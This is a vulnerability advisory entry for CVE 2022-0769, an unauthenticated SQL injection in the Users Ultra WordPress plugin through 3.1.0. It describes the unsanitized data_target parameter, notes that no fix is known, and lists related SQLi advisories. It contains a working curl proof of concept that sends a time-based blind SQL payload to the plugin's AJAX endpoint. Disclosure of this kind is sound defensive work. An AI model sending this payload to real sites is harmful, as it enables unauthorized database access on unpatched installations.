Users Ultra <= 3.1.0 – Unauthenticated SQL Injection | CVE 2022-0769 | Plugin Vulnerabilities

Description

The plugin fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php --data 'action=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(5)))gwe)--+'

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

05eab45d-ebe9-440f-b9c3-73ec40ef1141

Timeline

Publicly Published

2022-03-29 (about 2 years ago)

Added

2022-03-29 (about 2 years ago)

Last Updated

2022-04-13 (about 2 years ago)

Other

Published

Title

Published

2023-12-21

Title

BookIt < 2.4.4 - Authenticated(Administrator+) SQL Injection

Published

2024-03-26

Title

Photos and Files Contest Gallery < 21.3.2.1 - Authenticated (Contributor+) SQL Injection

Published

2014-08-01

Title

WP Symposium < 12.12 - Multiple SQL Injections

Published

2023-04-19

Title

Accessibility Suite by Online ADA <= 4.11 - Subscriber+ SQLi

Published

2015-07-07

Title

Pinpoint Booking System <= 2.0 - Authenticated Blind SQL Injection